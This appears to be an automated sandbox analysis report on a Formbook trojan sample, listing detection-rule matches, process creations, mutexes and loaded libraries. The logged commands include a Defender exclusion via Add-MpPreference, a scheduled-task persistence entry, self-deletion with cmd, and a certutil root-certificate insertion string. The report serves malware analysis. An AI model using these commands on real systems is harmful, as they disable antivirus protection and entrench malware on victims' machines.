Source: Process Memory Space: CZyOWoN2hiszA6d.exe PID: 7256, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmstp.exe PID: 7532, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: mstsc.exe PID: 7856, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: CZyOWoN2hiszA6d.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: dacYzRiJuWECy.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, vO6s1q9Pfwrxu7JWa1.cs	Security API names: _0020.SetAccessControl
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, vO6s1q9Pfwrxu7JWa1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, vO6s1q9Pfwrxu7JWa1.cs	Security API names: _0020.AddAccessRule
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, vO6s1q9Pfwrxu7JWa1.cs	Security API names: _0020.SetAccessControl
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, vO6s1q9Pfwrxu7JWa1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, vO6s1q9Pfwrxu7JWa1.cs	Security API names: _0020.AddAccessRule
Source: 0.2.CZyOWoN2hiszA6d.exe.97e0000.6.raw.unpack, Mmsu5AigAdJeUuP32P.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CZyOWoN2hiszA6d.exe.4670200.2.raw.unpack, Mmsu5AigAdJeUuP32P.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, Mmsu5AigAdJeUuP32P.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, vO6s1q9Pfwrxu7JWa1.cs	Security API names: _0020.SetAccessControl
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, vO6s1q9Pfwrxu7JWa1.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.CZyOWoN2hiszA6d.exe.46003e0.1.raw.unpack, vO6s1q9Pfwrxu7JWa1.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.evad.winEXE@1050/15@13/4

Source: C:\Windows\SysWOW64\cmstp.exe

Code function: 13_2_003C8F05 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,InitiateSystemShutdownW,AdjustTokenPrivileges,CloseHandle,

13_2_003C8F05

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe

File created: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1600:120:WilError_03
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7684:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4160:120:WilError_03

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe

File created: C:\Users\user\AppData\Local\Temp\tmp4BD3.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\cmstp.exe

Command line argument: kernel32.dll

13_2_003C6052

Source: CZyOWoN2hiszA6d.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: CZyOWoN2hiszA6d.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: CZyOWoN2hiszA6d.exe	ReversingLabs: Detection: 21%
Source: CZyOWoN2hiszA6d.exe	Virustotal: Detection: 38%

Source: cmstp.exe

String found in binary or memory: /k certutil.exe -f -enterprise -v -addstore Root "%s"

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe

File read: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe:Zone.Identifier

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe"
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp4BD3.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process created: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp620B.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process created: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe "C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe"
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe"	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp4BD3.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Process created: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmstp.exe "C:\Windows\SysWOW64\cmstp.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dacYzRiJuWECy" /XML "C:\Users\user\AppData\Local\Temp\tmp620B.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process created: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe "C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmstp.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe"
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"

Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\CZyOWoN2hiszA6d.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.internal.shell.broker.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dacYzRiJuWECy.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
